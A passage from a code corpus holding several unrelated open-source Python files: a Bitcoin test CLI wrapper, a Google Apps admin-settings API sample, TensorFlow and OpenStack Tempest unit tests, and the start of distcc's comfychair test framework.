def __call__(self, *args, **kwargs):
return self.cli.send_cli(self.command, *args, **kwargs)
def get_request(self, *args, **kwargs):
return lambda: self(*args, **kwargs)
class TestNodeCLI():
"""Interface to bitcoin-cli for an individual node"""
def __init__(self, binary, datadir):
self.options = []
self.binary = binary
self.datadir = datadir
self.input = None
self.log = logging.getLogger('TestFramework.bitcoincli')
def __call__(self, *options, input=None):
# TestNodeCLI is callable with bitcoin-cli command-line options
cli = TestNodeCLI(self.binary, self.datadir)
cli.options = [str(o) for o in options]
cli.input = input
return cli
def __getattr__(self, command):
return TestNodeCLIAttr(self, command)
def batch(self, requests):
results = []
for request in requests:
try:
results.append(dict(result=request()))
except JSONRPCException as e:
results.append(dict(error=e))
return results
def send_cli(self, command=None, *args, **kwargs):
"""Run bitcoin-cli command. Deserializes returned string as python object."""
pos_args = [str(arg).lower() if type(arg) is bool else str(arg) for arg in args]
named_args = [str(key) + "=" + str(value) for (key, value) in kwargs.items()]
assert not (pos_args and named_args), "Cannot use positional arguments and named arguments in the same bitcoin-cli call"
p_args = [self.binary, "-datadir=" + self.datadir] + self.options
if named_args:
p_args += ["-named"]
if command is not None:
p_args += [command]
p_args += pos_args + named_args
self.log.debug("Running bitcoin-cli command: %s" % command)
process = subprocess.Popen(p_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
cli_stdout, cli_stderr = process.communicate(input=self.input)
returncode = process.poll()
if returncode:
match = re.match(r'error code: ([-0-9]+)\nerror message:\n(.*)', cli_stderr)
if match:
code, message = match.groups()
raise JSONRPCException(dict(code=int(code), message=message))
# Ignore cli_stdout, raise with cli_stderr
raise subprocess.CalledProcessError(returncode, self.binary, output=cli_stderr)
try:
return json.loads(cli_stdout, parse_float=decimal.Decimal)
except JSONDecodeError:
return cli_stdout.rstrip("\n")
|
Eseoghene/bite-project
|
refs/heads/master
|
deps/gdata-python-client/samples/apps/adminsettings_example.py
|
41
|
#!/usr/bin/python
#
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains a Sample for Google Apps Admin Settings.
AdminSettingsSample: shows everything you ever wanted to know about
your Google Apps Domain but were afraid to ask.
"""
__author__ = 'jlee@pbu.edu'
import getopt
import getpass
import sys
import time
import gdata.apps.service
import gdata.apps.adminsettings.service
class AdminSettingsSample(object):
"""AdminSettingsSample object demos Admin Settings API."""
def __init__(self, email, password, domain):
"""Constructor for the AdminSettingsSample object.
Takes an email and password corresponding to a google apps admin
account to demon the Admin Settings API.
Args:
email: [string] The e-mail address of the account to use for the sample.
password: [string] The password corresponding to the account specified by
the email parameter.
domain: [string] The domain for the Profiles feed
"""
self.gd_client = gdata.apps.adminsettings.service.AdminSettingsService()
self.gd_client.domain = domain
self.gd_client.email = email
self.gd_client.password = password
self.gd_client.source = 'GoogleInc-AdminSettingsPythonSample-1'
self.gd_client.ProgrammaticLogin()
def Run(self):
#pause 1 sec inbetween calls to prevent quota warning
print 'Google Apps Domain: ', self.gd_client.domain
time.sleep(1)
print 'Default Language: ', self.gd_client.GetDefaultLanguage()
time.sleep(1)
print 'Organization Name: ', self.gd_client.GetOrganizationName()
time.sleep(1)
print 'Maximum Users: ', self.gd_client.GetMaximumNumberOfUsers()
time.sleep(1)
print 'Current Users: ', self.gd_client.GetCurrentNumberOfUsers()
time.sleep(1)
print 'Domain is Verified: ',self.gd_client.IsDomainVerified()
time.sleep(1)
print 'Support PIN: ',self.gd_client.GetSupportPIN()
time.sleep(1)
print 'Domain Edition: ', self.gd_client.GetEdition()
time.sleep(1)
print 'Customer PIN: ', self.gd_client.GetCustomerPIN()
time.sleep(1)
print 'Domain Creation Time: ', self.gd_client.GetCreationTime()
time.sleep(1)
print 'Domain Country Code: ', self.gd_client.GetCountryCode()
time.sleep(1)
print 'Admin Secondary Email: ', self.gd_client.GetAdminSecondaryEmail()
time.sleep(1)
cnameverificationstatus = self.gd_client.GetCNAMEVerificationStatus()
print 'CNAME Verification Record Name: ', cnameverificationstatus['recordName']
print 'CNAME Verification Verified: ', cnameverificationstatus['verified']
print 'CNAME Verification Method: ', cnameverificationstatus['verificationMethod']
time.sleep(1)
mxverificationstatus = self.gd_client.GetMXVerificationStatus()
print 'MX Verification Verified: ', mxverificationstatus['verified']
print 'MX Verification Method: ', mxverificationstatus['verificationMethod']
time.sleep(1)
ssosettings = self.gd_client.GetSSOSettings()
print 'SSO Enabled: ', ssosettings['enableSSO']
print 'SSO Signon Page: ', ssosettings['samlSignonUri']
print 'SSO Logout Page: ', ssosettings['samlLogoutUri']
print 'SSO Password Page: ', ssosettings['changePasswordUri']
print 'SSO Whitelist IPs: ', ssosettings['ssoWhitelist']
print 'SSO Use Domain Specific Issuer: ', ssosettings['useDomainSpecificIssuer']
time.sleep(1)
ssokey = self.gd_client.GetSSOKey()
print 'SSO Key Modulus: ', ssokey['modulus']
print 'SSO Key Exponent: ', ssokey['exponent']
print 'SSO Key Algorithm: ', ssokey['algorithm']
print 'SSO Key Format: ', ssokey['format']
print 'User Migration Enabled: ', self.gd_client.IsUserMigrationEnabled()
time.sleep(1)
outboundgatewaysettings = self.gd_client.GetOutboundGatewaySettings()
print 'Outbound Gateway Smart Host: ', outboundgatewaysettings['smartHost']
print 'Outbound Gateway Mode: ', outboundgatewaysettings['smtpMode']
def main():
"""Demonstrates use of the Admin Settings API using the AdminSettingsSample object."""
# Parse command line options
try:
opts, args = getopt.getopt(sys.argv[1:], '', ['user=', 'pw=', 'domain='])
except getopt.error, msg:
print 'python adminsettings_example.py --user [username] --pw [password]'
print ' --domain [domain]'
sys.exit(2)
user = ''
pw = ''
domain = ''
# Process options
for option, arg in opts:
if option == '--user':
user = arg
elif option == '--pw':
pw = arg
elif option == '--domain':
domain = arg
while not domain:
print 'NOTE: Please run these tests only with a test account.'
domain = raw_input('Please enter your apps domain: ')
while not user:
user = raw_input('Please enter a administrator account: ')+'@'+domain
while not pw:
pw = getpass.getpass('Please enter password: ')
if not pw:
print 'Password cannot be blank.'
try:
sample = AdminSettingsSample(user, pw, domain)
except gdata.service.BadAuthentication:
print 'Invalid user credentials given.'
return
sample.Run()
if __name__ == '__main__':
main()
|
yaroslavvb/tensorflow
|
refs/heads/master
|
tensorflow/python/kernel_tests/spacetodepth_op_test.py
|
90
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for SpacetoDepth op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class SpaceToDepthTest(test.TestCase):
def _testOne(self, inputs, block_size, outputs):
with self.test_session(use_gpu=True):
x_tf = array_ops.space_to_depth(math_ops.to_float(inputs), block_size)
self.assertAllEqual(x_tf.eval(), outputs)
def testBasic(self):
x_np = [[[[1], [2]], [[3], [4]]]]
block_size = 2
x_out = [[[[1, 2, 3, 4]]]]
self._testOne(x_np, block_size, x_out)
# Tests for larger input dimensions. To make sure elements are
# correctly ordered spatially.
def testLargerInput2x2(self):
x_np = [[[[1], [2], [5], [6]], [[3], [4], [7], [8]],
[[9], [10], [13], [14]], [[11], [12], [15], [16]]]]
block_size = 2
x_out = [[[[1, 2, 3, 4], [5, 6, 7, 8]], [[9, 10, 11, 12],
[13, 14, 15, 16]]]]
self._testOne(x_np, block_size, x_out)
# Tests for larger input dimensions. To make sure elements are
# correctly ordered in depth. Here, larger block size.
def testLargerInput4x4(self):
x_np = [[[[1], [2], [5], [6]], [[3], [4], [7], [8]],
[[9], [10], [13], [14]], [[11], [12], [15], [16]]]]
block_size = 4
x_out = [[[[1, 2, 5, 6, 3, 4, 7, 8, 9, 10, 13, 14, 11, 12, 15, 16]]]]
self._testOne(x_np, block_size, x_out)
# Tests for larger input depths.
# To make sure elements are properly interleaved in depth.
def testDepthInterleaved(self):
x_np = [[[[1, 10], [2, 20]], [[3, 30], [4, 40]]]]
block_size = 2
x_out = [[[[1, 10, 2, 20, 3, 30, 4, 40]]]]
self._testOne(x_np, block_size, x_out)
# Tests for larger input depths. Here an odd depth.
# To make sure elements are properly interleaved in depth.
def testDepthInterleavedDepth3(self):
x_np = [[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]]]
block_size = 2
x_out = [[[[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]]]]
self._testOne(x_np, block_size, x_out)
# Tests for larger input dimensions AND for larger input depths.
# To make sure elements are properly interleaved in depth and ordered
# spatially.
def testDepthInterleavedLarge(self):
x_np = [[[[1, 10], [2, 20], [5, 50], [6, 60]],
[[3, 30], [4, 40], [7, 70], [8, 80]],
[[9, 90], [10, 100], [13, 130], [14, 140]],
[[11, 110], [12, 120], [15, 150], [16, 160]]]]
block_size = 2
x_out = [[[[1, 10, 2, 20, 3, 30, 4, 40], [5, 50, 6, 60, 7, 70, 8, 80]],
[[9, 90, 10, 100, 11, 110, 12, 120],
[13, 130, 14, 140, 15, 150, 16, 160]]]]
self._testOne(x_np, block_size, x_out)
def testBlockSize2Batch10(self):
block_size = 2
def batch_input_elt(i):
return [[[1 * i], [2 * i], [5 * i], [6 * i]],
[[3 * i], [4 * i], [7 * i], [8 * i]],
[[9 * i], [10 * i], [13 * i], [14 * i]],
[[11 * i], [12 * i], [15 * i], [16 * i]]]
def batch_output_elt(i):
return [[[1 * i, 2 * i, 3 * i, 4 * i], [5 * i, 6 * i, 7 * i, 8 * i]],
[[9 * i, 10 * i, 11 * i, 12 * i],
[13 * i, 14 * i, 15 * i, 16 * i]]]
batch_size = 10
x_np = [batch_input_elt(i) for i in range(batch_size)]
x_out = [batch_output_elt(i) for i in range(batch_size)]
self._testOne(x_np, block_size, x_out)
# Tests for different width and height.
def testNonSquare(self):
x_np = [[[[1, 10], [2, 20]], [[3, 30], [4, 40]], [[5, 50], [6, 60]],
[[7, 70], [8, 80]], [[9, 90], [10, 100]], [[11, 110], [12, 120]]]]
block_size = 2
x_out = [[[[1, 10, 2, 20, 3, 30, 4, 40]], [[5, 50, 6, 60, 7, 70, 8, 80]],
[[9, 90, 10, 100, 11, 110, 12, 120]]]]
self._testOne(x_np, block_size, x_out)
# Error handling:
def testInputWrongDimMissingDepth(self):
# The input is missing the last dimension ("depth")
x_np = [[[1, 2], [3, 4]]]
block_size = 2
with self.assertRaises(ValueError):
out_tf = array_ops.space_to_depth(x_np, block_size)
out_tf.eval()
def testInputWrongDimMissingBatch(self):
# The input is missing the first dimension ("batch")
x_np = [[[1], [2]], [[3], [4]]]
block_size = 2
with self.assertRaises(ValueError):
_ = array_ops.space_to_depth(x_np, block_size)
def testBlockSize0(self):
# The block size is 0.
x_np = [[[[1], [2]], [[3], [4]]]]
block_size = 0
with self.assertRaises(ValueError):
out_tf = array_ops.space_to_depth(x_np, block_size)
out_tf.eval()
def testBlockSizeOne(self):
# The block size is 1. The block size needs to be > 1.
x_np = [[[[1], [2]], [[3], [4]]]]
block_size = 1
with self.assertRaises(ValueError):
out_tf = array_ops.space_to_depth(x_np, block_size)
out_tf.eval()
def testBlockSizeLarger(self):
# The block size is too large for this input.
x_np = [[[[1], [2]], [[3], [4]]]]
block_size = 10
with self.assertRaises(ValueError):
out_tf = array_ops.space_to_depth(x_np, block_size)
out_tf.eval()
def testBlockSizeNotDivisibleWidth(self):
# The block size divides width but not height.
x_np = [[[[1], [2], [3]], [[3], [4], [7]]]]
block_size = 3
with self.assertRaises(ValueError):
_ = array_ops.space_to_depth(x_np, block_size)
def testBlockSizeNotDivisibleHeight(self):
# The block size divides height but not width.
x_np = [[[[1], [2]], [[3], [4]], [[5], [6]]]]
block_size = 3
with self.assertRaises(ValueError):
_ = array_ops.space_to_depth(x_np, block_size)
def testBlockSizeNotDivisibleBoth(self):
# The block size does not divide neither width or height.
x_np = [[[[1], [2]], [[3], [4]]]]
block_size = 3
with self.assertRaises(ValueError):
_ = array_ops.space_to_depth(x_np, block_size)
def testUnknownShape(self):
t = array_ops.space_to_depth(
array_ops.placeholder(dtypes.float32), block_size=4)
self.assertEqual(4, t.get_shape().ndims)
class SpaceToDepthGradientTest(test.TestCase):
# Check the gradients.
def _checkGrad(self, x, block_size):
assert 4 == x.ndim
with self.test_session(use_gpu=True):
tf_x = ops.convert_to_tensor(x)
tf_y = array_ops.space_to_depth(tf_x, block_size)
epsilon = 1e-2
((x_jacob_t, x_jacob_n)) = gradient_checker.compute_gradient(
tf_x,
x.shape,
tf_y,
tf_y.get_shape().as_list(),
x_init_value=x,
delta=epsilon)
self.assertAllClose(x_jacob_t, x_jacob_n, rtol=1e-2, atol=epsilon)
# Tests a gradient for space_to_depth of x which is a four dimensional
# tensor of shape [b, h * block_size, w * block_size, d].
def _compare(self, b, h, w, d, block_size):
block_size_sq = block_size * block_size
x = np.random.normal(0, 1, b * h * w * d *
block_size_sq).astype(np.float32).reshape(
[b, h * block_size, w * block_size, d])
self._checkGrad(x, block_size)
# Don't use very large numbers as dimensions here as the result is tensor
# with cartesian product of the dimensions.
def testSmall(self):
block_size = 2
self._compare(1, 2, 3, 5, block_size)
def testSmall2(self):
block_size = 2
self._compare(2, 4, 3, 2, block_size)
if __name__ == "__main__":
test.main()
|
AsimmHirani/ISpyPi
|
refs/heads/master
|
tensorflow/contrib/tensorflow-master/tensorflow/python/util/future_api_test.py
|
173
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for future_api."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
# pylint: disable=unused-import
from tensorflow.python.util import future_api
# pylint: enable=unused-import
class ExampleParserConfigurationTest(tf.test.TestCase):
def testBasic(self):
self.assertFalse(hasattr(tf, 'arg_max'))
self.assertTrue(hasattr(tf, 'argmax'))
if __name__ == '__main__':
tf.test.main()
|
masayukig/tempest
|
refs/heads/master
|
tempest/api/compute/images/test_list_image_filters.py
|
2
|
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import time
import six
import testtools
from tempest.api.compute import base
from tempest.common import image as common_image
from tempest.common import waiters
from tempest import config
from tempest.lib.common.utils import data_utils
from tempest.lib.common.utils import test_utils
from tempest.lib import decorators
from tempest.lib import exceptions
CONF = config.CONF
class ListImageFiltersTestJSON(base.BaseV2ComputeTest):
max_microversion = '2.35'
@classmethod
def skip_checks(cls):
super(ListImageFiltersTestJSON, cls).skip_checks()
if not CONF.service_available.glance:
skip_msg = ("%s skipped as glance is not available" % cls.__name__)
raise cls.skipException(skip_msg)
@classmethod
def setup_clients(cls):
super(ListImageFiltersTestJSON, cls).setup_clients()
cls.client = cls.compute_images_client
# Check if glance v1 is available to determine which client to use. We
# prefer glance v1 for the compute API tests since the compute image
# API proxy was written for glance v1.
if CONF.image_feature_enabled.api_v1:
cls.glance_client = cls.os_primary.image_client
elif CONF.image_feature_enabled.api_v2:
cls.glance_client = cls.os_primary.image_client_v2
else:
raise exceptions.InvalidConfiguration(
'Either api_v1 or api_v2 must be True in '
'[image-feature-enabled].')
@classmethod
def resource_setup(cls):
super(ListImageFiltersTestJSON, cls).resource_setup()
def _create_image():
params = {
'name': data_utils.rand_name(cls.__name__ + '-image'),
'container_format': 'bare',
'disk_format': 'raw'
}
if CONF.image_feature_enabled.api_v1:
params.update({'is_public': False})
params = {'headers':
common_image.image_meta_to_headers(**params)}
else:
params.update({'visibility': 'private'})
body = cls.glance_client.create_image(**params)
body = body['image'] if 'image' in body else body
image_id = body['id']
cls.addClassResourceCleanup(
test_utils.call_and_ignore_notfound_exc,
cls.compute_images_client.delete_image,
image_id)
# Wait 1 second between creation and upload to ensure a delta
# between created_at and updated_at.
time.sleep(1)
image_file = six.BytesIO((b'*' * 1024))
if CONF.image_feature_enabled.api_v1:
cls.glance_client.update_image(image_id, data=image_file)
else:
cls.glance_client.store_image_file(image_id, data=image_file)
waiters.wait_for_image_status(cls.client, image_id, 'ACTIVE')
body = cls.client.show_image(image_id)['image']
return body
# Create non-snapshot images via glance
cls.image1 = _create_image()
cls.image1_id = cls.image1['id']
cls.image2 = _create_image()
cls.image2_id = cls.image2['id']
cls.image3 = _create_image()
cls.image3_id = cls.image3['id']
if not CONF.compute_feature_enabled.snapshot:
return
# Create instances and snapshots via nova
cls.server1 = cls.create_test_server()
cls.server2 = cls.create_test_server(wait_until='ACTIVE')
# NOTE(sdague) this is faster than doing the sync wait_util on both
waiters.wait_for_server_status(cls.servers_client,
cls.server1['id'], 'ACTIVE')
# Create images to be used in the filter tests
cls.snapshot1 = cls.create_image_from_server(
cls.server1['id'], wait_until='ACTIVE')
cls.snapshot1_id = cls.snapshot1['id']
# Servers have a hidden property for when they are being imaged
# Performing back-to-back create image calls on a single
# server will sometimes cause failures
cls.snapshot3 = cls.create_image_from_server(
cls.server2['id'], wait_until='ACTIVE')
cls.snapshot3_id = cls.snapshot3['id']
# Wait for the server to be active after the image upload
cls.snapshot2 = cls.create_image_from_server(
cls.server1['id'], wait_until='ACTIVE')
cls.snapshot2_id = cls.snapshot2['id']
@decorators.idempotent_id('a3f5b513-aeb3-42a9-b18e-f091ef73254d')
def test_list_images_filter_by_status(self):
# The list of images should contain only images with the
# provided status
params = {'status': 'ACTIVE'}
images = self.client.list_images(**params)['images']
self.assertNotEmpty([i for i in images if i['id'] == self.image1_id])
self.assertNotEmpty([i for i in images if i['id'] == self.image2_id])
self.assertNotEmpty([i for i in images if i['id'] == self.image3_id])
@decorators.idempotent_id('33163b73-79f5-4d07-a7ea-9213bcc468ff')
def test_list_images_filter_by_name(self):
# List of all images should contain the expected images filtered
# by name
params = {'name': self.image1['name']}
images = self.client.list_images(**params)['images']
self.assertNotEmpty([i for i in images if i['id'] == self.image1_id])
self.assertEmpty([i for i in images if i['id'] == self.image2_id])
self.assertEmpty([i for i in images if i['id'] == self.image3_id])
@decorators.idempotent_id('9f238683-c763-45aa-b848-232ec3ce3105')
@testtools.skipUnless(CONF.compute_feature_enabled.snapshot,
'Snapshotting is not available.')
def test_list_images_filter_by_server_id(self):
# The images should contain images filtered by server id
params = {'server': self.server1['id']}
images = self.client.list_images(**params)['images']
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot1_id],
"Failed to find image %s in images. "
"Got images %s" % (self.image1_id, images))
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot2_id])
self.assertEmpty([i for i in images if i['id'] == self.snapshot3_id])
@decorators.idempotent_id('05a377b8-28cf-4734-a1e6-2ab5c38bf606')
@testtools.skipUnless(CONF.compute_feature_enabled.snapshot,
'Snapshotting is not available.')
def test_list_images_filter_by_server_ref(self):
# The list of servers should be filtered by server ref
server_links = self.server2['links']
# Try all server link types
for link in server_links:
params = {'server': link['href']}
images = self.client.list_images(**params)['images']
self.assertEmpty([i for i in images
if i['id'] == self.snapshot1_id])
self.assertEmpty([i for i in images
if i['id'] == self.snapshot2_id])
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot3_id])
@decorators.idempotent_id('e3356918-4d3e-4756-81d5-abc4524ba29f')
@testtools.skipUnless(CONF.compute_feature_enabled.snapshot,
'Snapshotting is not available.')
def test_list_images_filter_by_type(self):
# The list of servers should be filtered by image type
params = {'type': 'snapshot'}
images = self.client.list_images(**params)['images']
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot1_id])
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot2_id])
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot3_id])
self.assertEmpty([i for i in images if i['id'] == self.image_ref])
@decorators.idempotent_id('3a484ca9-67ba-451e-b494-7fcf28d32d62')
def test_list_images_limit_results(self):
# Verify only the expected number of results are returned
params = {'limit': '1'}
images = self.client.list_images(**params)['images']
self.assertEqual(1, len([x for x in images if 'id' in x]))
@decorators.idempotent_id('18bac3ae-da27-436c-92a9-b22474d13aab')
def test_list_images_filter_by_changes_since(self):
# Verify only updated images are returned in the detailed list
# Becoming ACTIVE will modify the updated time
# Filter by the image's created time
params = {'changes-since': self.image3['created']}
images = self.client.list_images(**params)['images']
found = [i for i in images if i['id'] == self.image3_id]
self.assertNotEmpty(found)
@decorators.idempotent_id('9b0ea018-6185-4f71-948a-a123a107988e')
def test_list_images_with_detail_filter_by_status(self):
# Detailed list of all images should only contain images
# with the provided status
params = {'status': 'ACTIVE'}
images = self.client.list_images(detail=True, **params)['images']
self.assertNotEmpty([i for i in images if i['id'] == self.image1_id])
self.assertNotEmpty([i for i in images if i['id'] == self.image2_id])
self.assertNotEmpty([i for i in images if i['id'] == self.image3_id])
@decorators.idempotent_id('644ea267-9bd9-4f3b-af9f-dffa02396a17')
def test_list_images_with_detail_filter_by_name(self):
# Detailed list of all images should contain the expected
# images filtered by name
params = {'name': self.image1['name']}
images = self.client.list_images(detail=True, **params)['images']
self.assertNotEmpty([i for i in images if i['id'] == self.image1_id])
self.assertEmpty([i for i in images if i['id'] == self.image2_id])
self.assertEmpty([i for i in images if i['id'] == self.image3_id])
@decorators.idempotent_id('ba2fa9a9-b672-47cc-b354-3b4c0600e2cb')
def test_list_images_with_detail_limit_results(self):
# Verify only the expected number of results (with full details)
# are returned
params = {'limit': '1'}
images = self.client.list_images(detail=True, **params)['images']
self.assertEqual(1, len(images))
@decorators.idempotent_id('8c78f822-203b-4bf6-8bba-56ebd551cf84')
@testtools.skipUnless(CONF.compute_feature_enabled.snapshot,
'Snapshotting is not available.')
def test_list_images_with_detail_filter_by_server_ref(self):
# Detailed list of servers should be filtered by server ref
server_links = self.server2['links']
# Try all server link types
for link in server_links:
params = {'server': link['href']}
images = self.client.list_images(detail=True, **params)['images']
self.assertEmpty([i for i in images
if i['id'] == self.snapshot1_id])
self.assertEmpty([i for i in images
if i['id'] == self.snapshot2_id])
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot3_id])
@decorators.idempotent_id('888c0cc0-7223-43c5-9db0-b125fd0a393b')
@testtools.skipUnless(CONF.compute_feature_enabled.snapshot,
'Snapshotting is not available.')
def test_list_images_with_detail_filter_by_type(self):
# The detailed list of servers should be filtered by image type
params = {'type': 'snapshot'}
images = self.client.list_images(detail=True, **params)['images']
self.client.show_image(self.image_ref)
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot1_id])
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot2_id])
self.assertNotEmpty([i for i in images
if i['id'] == self.snapshot3_id])
self.assertEmpty([i for i in images if i['id'] == self.image_ref])
@decorators.idempotent_id('7d439e18-ac2e-4827-b049-7e18004712c4')
def test_list_images_with_detail_filter_by_changes_since(self):
# Verify an update image is returned
# Becoming ACTIVE will modify the updated time
# Filter by the image's created time
params = {'changes-since': self.image1['created']}
images = self.client.list_images(detail=True, **params)['images']
self.assertNotEmpty([i for i in images if i['id'] == self.image1_id])
|
GarethNelson/distcc
|
refs/heads/master
|
test/comfychair.py
|
24
|
#! /usr/bin/env python
# Copyright (C) 2002, 2003 by Martin Pool <mbp@samba.org>
# Copyright (C) 2003 by Tim Potter <tpot@samba.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,
# USA.
"""comfychair: a Python-based instrument of software torture.
Copyright (C) 2002, 2003 by Martin Pool <mbp@samba.org>
Copyright (C) 2003 by Tim Potter <tpot@samba.org>
This is a test framework designed for testing programs written in
Python, or (through a fork/exec interface) any other language.
For more information, see the file README.comfychair.
To run a test suite based on ComfyChair, just run it as a program.
"""
import sys, os, re, shutil
class TestCase:
"""A base class for tests. This class defines required functions which
can optionally be overridden by subclasses. It also provides some
utility functions for"""
def __init__(self):
self.test_log = ""
self.background_pids = []
self._cleanups = []
self._enter_rundir()
self._save_environment()
self.add_cleanup(self.teardown)
# Prevent localizations interfering with attempts to parse
# program output and error messages. LC_ALL has higher
# priority (see locale(7)), but set both just in case.
os.environ['LANG'] = 'C'
os.environ['LC_ALL'] = 'C'
# --------------------------------------------------
# Save and restore directory
def _enter_rundir(self):
self.basedir = os.getcwd()
self.add_cleanup(self._restore_directory)
self.rundir = os.path.join(self.basedir,
'_testtmp',
self.__class__.__name__)
self.tmpdir = os.path.join(self.rundir, 'tmp')
shutil.rmtree(self.rundir, ignore_errors=1)
os.makedirs(self.tmpdir)
os.chdir(self.rundir)
def _restore_directory(self):
os.chdir(self.basedir)
# --------------------------------------------------
# Save and restore environment
def _save_environment(self):
self._saved_environ = os.environ.copy()
self.add_cleanup(self._restore_environment)
def _restore_environment(self):
os.environ.clear()
os.environ.update(self._saved_environ)
def setup(self):
"""Set up test fixture."""
pass
def teardown(self):
"""Tear down test fixture."""
pass
def runtest(self):
"""Run the test."""
pass
def add_cleanup(self, c):
"""Queue a cleanup to be run when the test is complete."""
self._cleanups.append(c)
def apply_cleanups(self, debugger):
"""Apply cleanup functions and return error code.
Returns:
0 on success; 2 if a KeyboardInterrupt occurs; 1 if any other exception
occurs.
"""
while self._cleanups:
try:
apply(self._cleanups.pop())
except KeyboardInterrupt:
print "interrupted during cleanups"
_report_error(self, debugger)
return 2
except:
print "error during cleanups"
_report_error(self, debugger)
return 1
return 0
def fail(self, reason = ""):
"""Say the test failed."""
raise AssertionError(reason)
#############################################################
# Requisition methods
def require(self, predicate, message):
"""Check a predicate for running this test.
If the predicate value is not true, the test is skipped with a message explaining
why."""
if not predicate:
raise NotRunError, message
def require_root(self):
"""Skip this test unless run by root."""
self.require(os.getuid() == 0,
"must be root to run this test")
#############################################################
# Assertion methods
def assert_(self, expr, reason = ""):
if not expr:
raise AssertionError(reason)
def assert_equal(self, a, b):
if not a == b:
raise AssertionError("assertEquals failed: %s" % `(a, b)`)
def assert_notequal(self, a, b):
if a == b:
raise AssertionError("assertNotEqual failed: %s" % `(a, b)`)
def assert_re_match(self, pattern, s):
"""Assert that a string matches a particular pattern
Inputs:
pattern string: regular expression
s string: to be matched
Raises:
AssertionError if not matched
"""
if not re.match(pattern, s):
raise AssertionError("string does not match regexp\n"
" string: %s\n"
" re: %s" % (`s`, `pattern`))
def assert_re_search(self, pattern, s):
"""Assert that a string *contains* a particular pattern
Inputs:
pattern string: regular expression
s string: to be searched
Raises:
AssertionError if not matched
"""
if not re.search(pattern, s):
raise AssertionError("string does not contain regexp\n"
" string: %s\n"
" re: %s" % (`s`, `pattern`))
def assert_no_file(self, filename):
assert not os.path.exists(filename), ("file exists but should not: %s" % filename)
#############################################################
# Methods for running programs
def runcmd_background(self, cmd):
self.test_log = self.test_log + "Run in background:\n" + `cmd` + "\n"
pid = os.fork()
if pid == 0:
# child
try:
os.execvp("/bin/sh", ["/bin/sh", "-c", cmd])
finally:
os._exit(127)
self.test_log = self.test_log + "pid: %d\n" % pid
return pid
def runcmd(self, cmd, expectedResult = 0):
"""Run a command, fail if the command returns an unexpected exit
code. Return the output produced."""
rc, output, stderr = self.runcmd_unchecked(cmd)
if rc != expectedResult:
raise AssertionError("""command returned %d; expected %s: \"%s\"
stdout:
%s
stderr:
%s""" % (rc, expectedResult, cmd, output, stderr))
return output, stderr
def run_captured(self, cmd):
"""Run a command, capturing stdout and stderr.
Based in part on popen2.py
Returns (waitstatus, stdout, stderr)."""
import types
pid = os.fork()
if pid == 0:
# child
try:
pid = os.getpid()
openmode = os.O_WRONLY|os.O_CREAT|os.O_TRUNC
outfd = os.open('%d.out' % pid, openmode, 0666)
os.dup2(outfd, 1)
os.close(outfd)
errfd = os.open('%d.err' % pid, openmode, 0666)
os.dup2(errfd, 2)
os.close(errfd)
if isinstance(cmd, types.StringType):
cmd = ['/bin/sh', '-c', cmd]
os.execvp(cmd[0], cmd)
finally:
os._exit(127)
else:
# parent
exited_pid, waitstatus = os.waitpid(pid, 0)
stdout = open('%d.out' % pid).read()
stderr = open('%d.err' % pid).read()
return waitstatus, stdout, stderr
